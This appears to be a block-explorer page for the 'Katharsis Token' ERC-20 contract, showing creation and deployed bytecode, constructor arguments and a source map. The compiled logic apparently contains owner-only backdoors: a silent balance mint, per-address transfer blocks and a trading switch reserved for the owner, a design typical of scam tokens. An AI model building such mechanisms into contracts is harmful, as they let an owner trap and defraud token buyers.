1152b565b9050919050565b6000602082019050818103600083015261172581611591565b9050919050565b60006020820190508181036000830152611745816115d1565b9050919050565b6000602082019050818103600083015261176581611611565b9050919050565b600060208201905081810360008301526117858161162b565b9050919050565b60006020820190506117a16000830184611691565b92915050565b60006020820190506117bc60008301846116a0565b92915050565b600081519050919050565b600082825260208201905092915050565b60006117e9826118a6565b91506117f4836118a6565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561182957611828611922565b5b828201905092915050565b600061183f826118a6565b915061184a836118a6565b92508282101561185d5761185c611922565b5b828203905092915050565b600061187382611886565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156118db5780820151818401526020810190506118c0565b838111156118ea576000848401525b50505050565b6000600282049050600182168061190857607f821691505b6020821081141561191c5761191b611951565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b61199a81611868565b81146119a557600080fd5b50565b6119b1816118a6565b81146119bc57600080fd5b5056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212204fe78ff4941e1a3ff42169f9f845dad6f0d38bf4b16f1671c5263e656da41fca64736f6c63430008000033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000003635c9adc5dea00000000000000000000000000000000000000000000000000000000000000000000f4b617468617273697320546f6b656e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094b41544841525349530000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a9059cbb11610071578063a9059cbb146102ce578063ad596bb4146102fe578063bb806dc91461032e578063dd62ed3e14610338578063ea2f0b37146103685761010b565b806370a082311461023457806395d89b41146102645780639f08b31914610282578063a457c2d71461029e5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca5780633177029f146101e857806339509351146102045761010b565b806306fdde0314610110578063095ea7b31461012e578063158ef93e1461015e57806318160ddd1461017c575b600080fd5b610118610384565b60405161012591906116ca565b60405180910390f35b610148600480360381019061014391906114a7565b610416565b60405161015591906116af565b60405180910390f35b610166610434565b60405161017391906116af565b60405180910390f35b61018461044b565b604051610191919061178c565b60405180910390f35b6101b460048036038101906101af9190611458565b610455565b6040516101c191906116af565b60405180910390f35b6101d261052e565b6040516101df91906117a7565b60405180910390f35b61020260048036038101906101fd91906114a7565b610545565b005b61021e600480360381019061021991906114a7565b610673565b60405161022b91906116af565b60405180910390f35b61024e600480360381019061024991906113f3565b610726565b60405161025b919061178c565b60405180910390f35b61026c61076f565b60405161027991906116ca565b60405180910390f35b61029c600480360381019061029791906113f3565b610801565b005b6102b860048036038101906102b391906114a7565b6108f0565b6040516102c591906116af565b60405180910390f35b6102e860048036038101906102e391906114a7565b6109bd565b6040516102f591906116af565b60405180910390f35b610318600480360381019061031391906113f3565b6109db565b60405161032591906116af565b60405180910390f35b610336610a31565b005b610352600480360381019061034d919061141c565b610b23565b60405161035f919061178c565b60405180910390f35b610382600480360381019061037d91906113f3565b610baa565b005b606060058054610393906118f0565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906118f0565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610cf8565b8484610d00565b6001905092915050565b6000600460009054906101000a900460ff16905090565b6000600854905090565b6000610462848484610ecb565b6105238461046e610cf8565b61051e856040518060600160405280602881526020016119c060289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104d4610cf8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113379092919063ffffffff16565b610d00565b600190509392505050565b6000600760009054906101000a900460ff16905090565b61054d610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105d19061172c565b60405180910390fd5b61062c81600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c9a90919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b600061071c610680610cf8565b846107178560036000610691610cf8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c9a90919063ffffffff16565b610d00565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606006805461077e906118f0565b80601f01602080910402602001604051908101604052809291908181526020018280546107aa906118f0565b80156107f75780601f106107cc576101008083540402835291602001916107f7565b820191906000526020600020905b8154815290600101906020018083116107da57829003601f168201915b5050505050905090565b610809610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610896576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088d9061172c565b60405180910390fd5b60018060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60006109b36108fd610cf8565b846109ae856040518060600160405280602581526020016119e86025913960036000610927610cf8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113379092919063ffffffff16565b610d00565b6001905092915050565b60006109d16109ca610cf8565b8484610ecb565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610a39610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ac6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610abd9061172c565b60405180910390fd5b6001600460006101000a81548160ff021916908315150217905515610b05576000600460006101000a81548160ff021916908315150217905550610b21565b6001600460006101000a81548160ff0219169083151502179055505b565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610bb2610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c369061172c565b60405180910390fd5b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000808284610ca991906117de565b905083811015610cee576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce59061170c565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d679061176c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610de0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd7906116ec565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ebe919061178c565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f329061174c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa29061174c565b60405180910390fd5b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061104c5750600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110955760008114611094576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108b9061174c565b60405180910390fd5b5b60011515600460009054906101000a900460ff16151514806110e957506110ba61139b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b8061112657506110f761139b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b156112db576111368383836113c4565b6111998160405180602001604052806000815250600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113379092919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061122e81600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c9a90919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516112ce919061178c565b60405180910390a3611332565b60011515600460009054906101000a900460ff16151514611331576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113289061174c565b60405180910390fd5b5b505050565b600083831115829061137f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137691906116ca565b60405180910390fd5b506000838561138e9190611834565b9050809150509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b6000813590506113d881611991565b92915050565b6000813590506113ed816119a8565b92915050565b60006020828403121561140557600080fd5b6000611413848285016113c9565b91505092915050565b6000806040838503121561142f57600080fd5b600061143d858286016113c9565b925050602061144e858286016113c9565b9150509250929050565b60008060006060848603121561146d57600080fd5b600061147b868287016113c9565b935050602061148c868287016113c9565b925050604061149d868287016113de565b9150509250925092565b600080604083850312156114ba57600080fd5b60006114c8858286016113c9565b92505060206114d9858286016113de565b9150509250929050565b6114ec8161187a565b82525050565b60006114fd826117c2565b61150781856117cd565b93506115178185602086016118bd565b61152081611980565b840191505092915050565b60006115386022836117cd565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061159e601b836117cd565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b60006115de6020836117cd565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b600061161e6000836117cd565b9150600082019050919050565b60006116386024836117cd565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61169a816118a6565b82525050565b6116a9816118b0565b82525050565b60006020820190506116c460008301846114e3565b92915050565b600060208201905081810360008301526116e481846114f2565b905092915050565b600060208201905081810360008301526117058161152b565b9050919050565b6000602082019050818103600083015261172581611591565b9050919050565b60006020820190508181036000830152611745816115d1565b9050919050565b6000602082019050818103600083015261176581611611565b9050919050565b600060208201905081810360008301526117858161162b565b9050919050565b60006020820190506117a16000830184611691565b92915050565b60006020820190506117bc60008301846116a0565b92915050565b600081519050919050565b600082825260208201905092915050565b60006117e9826118a6565b91506117f4836118a6565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561182957611828611922565b5b828201905092915050565b600061183f826118a6565b915061184a836118a6565b92508282101561185d5761185c611922565b5b828203905092915050565b600061187382611886565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b838110156118db5780820151818401526020810190506118c0565b838111156118ea576000848401525b50505050565b6000600282049050600182168061190857607f821691505b6020821081141561191c5761191b611951565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b61199a81611868565b81146119a557600080fd5b50565b6119b1816118a6565b81146119bc57600080fd5b5056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212204fe78ff4941e1a3ff42169f9f845dad6f0d38bf4b16f1671c5263e656da41fca64736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000003635c9adc5dea00000000000000000000000000000000000000000000000000000000000000000000f4b617468617273697320546f6b656e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094b41544841525349530000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Katharsis Token
Arg [1] : symbol_ (string): KATHARSIS
Arg [2] : totalSupply_ (uint256): 1000000000000000000000

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 00000000000000000000000000000000000000000000003635c9adc5dea00000
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000f
Arg [4] : 4b617468617273697320546f6b656e0000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [6] : 4b41544841525349530000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

2514:7690:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3502:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5587:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5372:84;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4225:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6572:321;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4077:83;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7513:146;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7202:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4388:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3704:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5819:105;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7933:269;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4704:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6160:113;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5161:120;;;:::i;:::-;;4942:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5984:107;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3502:83;3539:13;3572:5;3565:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3502:83;:::o;5587:169::-;5670:4;5687:39;5696:12;:10;:12::i;:::-;5710:7;5719:6;5687:8;:39::i;:::-;5744:4;5737:11;;5587:169;;;;:::o;5372:84::-;5416:4;5440:8;;;;;;;;;;;5433:15;;5372:84;:::o;4225:100::-;4278:7;4305:12;;4298:19;;4225:100;:::o;6572:321::-;6678:4;6695:36;6705:6;6713:9;6724:6;6695:9;:36::i;:::-;6742:121;6751:6;6759:12;:10;:12::i;:::-;6773:89;6811:6;6773:89;;;;;;;;;;;;;;;;;:11;:19;6785:6;6773:19;;;;;;;;;;;;;;;:33;6793:12;:10;:12::i;:::-;6773:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;6742:8;:121::i;:::-;6881:4;6874:11;;6572:321;;;;;:::o;4077:83::-;4118:5;4143:9;;;;;;;;;;;4136:16;;4077:83;:::o;7513:146::-;992:12:2;:10;:12::i;:::-;982:22;;:6;;;;;;;;;;:22;;;974:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;7621:30:1::1;7644:6;7621:9;:18;7631:7;7621:18;;;;;;;;;;;;;;;;:22;;:30;;;;:::i;:::-;7600:9;:18;7610:7;7600:18;;;;;;;;;;;;;;;:51;;;;7513:146:::0;;:::o;7202:218::-;7290:4;7307:83;7316:12;:10;:12::i;:::-;7330:7;7339:50;7378:10;7339:11;:25;7351:12;:10;:12::i;:::-;7339:25;;;;;;;;;;;;;;;:34;7365:7;7339:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;7307:8;:83::i;:::-;7408:4;7401:11;;7202:218;;;;:::o;4388:119::-;4454:7;4481:9;:18;4491:7;4481:18;;;;;;;;;;;;;;;;4474:25;;4388:119;;;:::o;3704:87::-;3743:13;3776:7;3769:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3704:87;:::o;5819:105::-;992:12:2;:10;:12::i;:::-;982:22;;:6;;;;;;;;;;:22;;;974:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;5912:4:1::1;5888:12:::0;:21:::1;5901:7;5888:21;;;;;;;;;;;;;;;;:28;;;;;;;;;;;;;;;;;;5819:105:::0;:::o;7933:269::-;8026:4;8043:129;8052:12;:10;:12::i;:::-;8066:7;8075:96;8114:15;8075:96;;;;;;;;;;;;;;;;;:11;:25;8087:12;:10;:12::i;:::-;8075:25;;;;;;;;;;;;;;;:34;8101:7;8075:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;8043:8;:129::i;:::-;8190:4;8183:11;;7933:269;;;;:::o;4704:175::-;4790:4;4807:42;4817:12;:10;:12::i;:::-;4831:9;4842:6;4807:9;:42::i;:::-;4867:4;4860:11;;4704:175;;;;:::o;6160:113::-;6220:4;6244:12;:21;6257:7;6244:21;;;;;;;;;;;;;;;;;;;;;;;;;6237:28;;6160:113;;;:::o;5161:120::-;992:12:2;:10;:12::i;:::-;982:22;;:6;;;;;;;;;;:22;;;974:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;5225:4:1::1;5214:8;;:15;;;;;;;;;;;;;;;;;5210:64;;;5243:5;5232:8;;:16;;;;;;;;;;;;;;;;;;5210:64;;;5268:4;5257:8;;:15;;;;;;;;;;;;;;;;;;5210:64;5161:120::o:0;4942:151::-;5031:7;5058:11;:18;5070:5;5058:18;;;;;;;;;;;;;;;:27;5077:7;5058:27;;;;;;;;;;;;;;;;5051:34;;4942:151;;;;:::o;5984:107::-;992:12:2;:10;:12::i;:::-;982:22;;:6;;;;;;;;;;:22;;;974:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;6078:5:1::1;6054:12;:21;6067:7;6054:21;;;;;;;;;;;;;;;;:29;;;;;;;;;;;;;;;;;;5984:107:::0;:::o;623:181:3:-;681:7;701:9;717:1;713;:5;;;;:::i;:::-;701:17;;742:1;737;:6;;729:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;795:1;788:8;;;623:181;;;;:::o;479:98:0:-;532:7;559:10;552:17;;479:98;:::o;9331:345:1:-;9450:1;9433:19;;:5;:19;;;;9425:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9531:1;9512:21;;:7;:21;;;;9504:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9615:6;9585:11;:18;9597:5;9585:18;;;;;;;;;;;;;;;:27;9604:7;9585:27;;;;;;;;;;;;;;;:36;;;;9652:7;9636:32;;9645:5;9636:32;;;9661:6;9636:32;;;;;;:::i;:::-;;;;;;;;9331:345;;;:::o;8473:633::-;8597:1;8579:20;;:6;:20;;;;8571:33;;;;;;;;;;;;:::i;:::-;;;;;;;;;8635:1;8614:23;;:9;:23;;;;8606:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;8657:12;:20;8670:6;8657:20;;;;;;;;;;;;;;;;;;;;;;;;;:47;;;;8681:12;:23;8694:9;8681:23;;;;;;;;;;;;;;;;;;;;;;;;;8657:47;8653:78;;;8725:1;8715:6;:11;8706:25;;;;;;;;;;;;:::i;:::-;;;;;;;;;8653:78;8758:4;8746:16;;:8;;;;;;;;;;;:16;;;:37;;;;8776:7;:5;:7::i;:::-;8766:17;;:6;:17;;;8746:37;:61;;;;8800:7;:5;:7::i;:::-;8787:20;;:9;:20;;;8746:61;8742:357;;;8820:47;8841:6;8849:9;8860:6;8820:20;:47::i;:::-;8898:33;8920:6;8898:33;;;;;;;;;;;;:9;:17;8908:6;8898:17;;;;;;;;;;;;;;;;:21;;:33;;;;;:::i;:::-;8878:9;:17;8888:6;8878:17;;;;;;;;;;;;;;;:53;;;;8965:32;8990:6;8965:9;:20;8975:9;8965:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;8942:9;:20;8952:9;8942:20;;;;;;;;;;;;;;;:55;;;;9030:9;9013:35;;9022:6;9013:35;;;9041:6;9013:35;;;;;;:::i;:::-;;;;;;;;8742:357;;;9088:4;9076:16;;:8;;;;;;;;;;;:16;;;9067:30;;;;;;;;;;;;:::i;:::-;;;;;;;;;8742:357;8473:633;;;:::o;1372:192:3:-;1458:7;1491:1;1486;:6;;1494:12;1478:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;1518:9;1534:1;1530;:5;;;;:::i;:::-;1518:17;;1555:1;1548:8;;;1372:192;;;;;:::o;768:81:2:-;808:7;835:6;;;;;;;;;;;828:13;;768:81;:::o;10109:92:1:-;;;;:::o;7:139:4:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;152:139::-;;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;204:87;;;;:::o;297:262::-;;405:2;393:9;384:7;380:23;376:32;373:2;;;421:1;418;411:12;373:2;464:1;489:53;534:7;525:6;514:9;510:22;489:53;:::i;:::-;479:63;;435:117;363:196;;;;:::o;565:407::-;;;690:2;678:9;669:7;665:23;661:32;658:2;;;706:1;703;696:12;658:2;749:1;774:53;819:7;810:6;799:9;795:22;774:53;:::i;:::-;764:63;;720:117;876:2;902:53;947:7;938:6;927:9;923:22;902:53;:::i;:::-;892:63;;847:118;648:324;;;;;:::o;978:552::-;;;;1120:2;1108:9;1099:7;1095:23;1091:32;1088:2;;;1136:1;1133;1126:12;1088:2;1179:1;1204:53;1249:7;1240:6;1229:9;1225:22;1204:53;:::i;:::-;1194:63;;1150:117;1306:2;1332:53;1377:7;1368:6;1357:9;1353:22;1332:53;:::i;:::-;1322:63;;1277:118;1434:2;1460:53;1505:7;1496:6;1485:9;1481:22;1460:53;:::i;:::-;1450:63;;1405:118;1078:452;;;;;:::o;1536:407::-;;;1661:2;1649:9;1640:7;1636:23;1632:32;1629:2;;;1677:1;1674;1667:12;1629:2;1720:1;1745:53;1790:7;1781:6;1770:9;1766:22;1745:53;:::i;:::-;1735:63;;1691:117;1847:2;1873:53;1918:7;1909:6;1898:9;1894:22;1873:53;:::i;:::-;1863:63;;1818:118;1619:324;;;;;:::o;1949:109::-;2030:21;2045:5;2030:21;:::i;:::-;2025:3;2018:34;2008:50;;:::o;2064:364::-;;2180:39;2213:5;2180:39;:::i;:::-;2235:71;2299:6;2294:3;2235:71;:::i;:::-;2228:78;;2315:52;2360:6;2355:3;2348:4;2341:5;2337:16;2315:52;:::i;:::-;2392:29;2414:6;2392:29;:::i;:::-;2387:3;2383:39;2376:46;;2156:272;;;;;:::o;2434:366::-;;2597:67;2661:2;2656:3;2597:67;:::i;:::-;2590:74;;2694:34;2690:1;2685:3;2681:11;2674:55;2760:4;2755:2;2750:3;2746:12;2739:26;2791:2;2786:3;2782:12;2775:19;;2580:220;;;:::o;2806:325::-;;2969:67;3033:2;3028:3;2969:67;:::i;:::-;2962:74;;3066:29;3062:1;3057:3;3053:11;3046:50;3122:2;3117:3;3113:12;3106:19;;2952:179;;;:::o;3137:330::-;;3300:67;3364:2;3359:3;3300:67;:::i;:::-;3293:74;;3397:34;3393:1;3388:3;3384:11;3377:55;3458:2;3453:3;3449:12;3442:19;;3283:184;;;:::o;3473:263::-;;3636:66;3700:1;3695:3;3636:66;:::i;:::-;3629:73;;3728:1;3723:3;3719:11;3712:18;;3619:117;;;:::o;3742:368::-;;3905:67;3969:2;3964:3;3905:67;:::i;:::-;3898:74;;4002:34;3998:1;3993:3;3989:11;3982:55;4068:6;4063:2;4058:3;4054:12;4047:28;4101:2;4096:3;4092:12;4085:19;;3888:222;;;:::o;4116:118::-;4203:24;4221:5;4203:24;:::i;:::-;4198:3;4191:37;4181:53;;:::o;4240:112::-;4323:22;4339:5;4323:22;:::i;:::-;4318:3;4311:35;4301:51;;:::o;4358:210::-;;4483:2;4472:9;4468:18;4460:26;;4496:65;4558:1;4547:9;4543:17;4534:6;4496:65;:::i;:::-;4450:118;;;;:::o;4574:313::-;;4725:2;4714:9;4710:18;4702:26;;4774:9;4768:4;4764:20;4760:1;4749:9;4745:17;4738:47;4802:78;4875:4;4866:6;4802:78;:::i;:::-;4794:86;;4692:195;;;;:::o;4893:419::-;;5097:2;5086:9;5082:18;5074:26;;5146:9;5140:4;5136:20;5132:1;5121:9;5117:17;5110:47;5174:131;5300:4;5174:131;:::i;:::-;5166:139;;5064:248;;;:::o;5318:419::-;;5522:2;5511:9;5507:18;5499:26;;5571:9;5565:4;5561:20;5557:1;5546:9;5542:17;5535:47;5599:131;5725:4;5599:131;:::i;:::-;5591:139;;5489:248;;;:::o;5743:419::-;;5947:2;5936:9;5932:18;5924:26;;5996:9;5990:4;5986:20;5982:1;5971:9;5967:17;5960:47;6024:131;6150:4;6024:131;:::i;:::-;6016:139;;5914:248;;;:::o;6168:419::-;;6372:2;6361:9;6357:18;6349:26;;6421:9;6415:4;6411:20;6407:1;6396:9;6392:17;6385:47;6449:131;6575:4;6449:131;:::i;:::-;6441:139;;6339:248;;;:::o;6593:419::-;;6797:2;6786:9;6782:18;6774:26;;6846:9;6840:4;6836:20;6832:1;6821:9;6817:17;6810:47;6874:131;7000:4;6874:131;:::i;:::-;6866:139;;6764:248;;;:::o;7018:222::-;;7149:2;7138:9;7134:18;7126:26;;7162:71;7230:1;7219:9;7215:17;7206:6;7162:71;:::i;:::-;7116:124;;;;:::o;7246:214::-;;7373:2;7362:9;7358:18;7350:26;;7386:67;7450:1;7439:9;7435:17;7426:6;7386:67;:::i;:::-;7340:120;;;;:::o;7466:99::-;;7552:5;7546:12;7536:22;;7525:40;;;:::o;7571:169::-;;7689:6;7684:3;7677:19;7729:4;7724:3;7720:14;7705:29;;7667:73;;;;:::o;7746:305::-;;7805:20;7823:1;7805:20;:::i;:::-;7800:25;;7839:20;7857:1;7839:20;:::i;:::-;7834:25;;7993:1;7925:66;7921:74;7918:1;7915:81;7912:2;;;7999:18;;:::i;:::-;7912:2;8043:1;8040;8036:9;8029:16;;7790:261;;;;:::o;8057:191::-;;8117:20;8135:1;8117:20;:::i;:::-;8112:25;;8151:20;8169:1;8151:20;:::i;:::-;8146:25;;8190:1;8187;8184:8;8181:2;;;8195:18;;:::i;:::-;8181:2;8240:1;8237;8233:9;8225:17;;8102:146;;;;:::o;8254:96::-;;8320:24;8338:5;8320:24;:::i;:::-;8309:35;;8299:51;;;:::o;8356:90::-;;8433:5;8426:13;8419:21;8408:32;;8398:48;;;:::o;8452:126::-;;8529:42;8522:5;8518:54;8507:65;;8497:81;;;:::o;8584:77::-;;8650:5;8639:16;;8629:32;;;:::o;8667:86::-;;8742:4;8735:5;8731:16;8720:27;;8710:43;;;:::o;8759:307::-;8827:1;8837:113;8851:6;8848:1;8845:13;8837:113;;;8936:1;8931:3;8927:11;8921:18;8917:1;8912:3;8908:11;8901:39;8873:2;8870:1;8866:10;8861:15;;8837:113;;;8968:6;8965:1;8962:13;8959:2;;;9048:1;9039:6;9034:3;9030:16;9023:27;8959:2;8808:258;;;;:::o;9072:320::-;;9153:1;9147:4;9143:12;9133:22;;9200:1;9194:4;9190:12;9221:18;9211:2;;9277:4;9269:6;9265:17;9255:27;;9211:2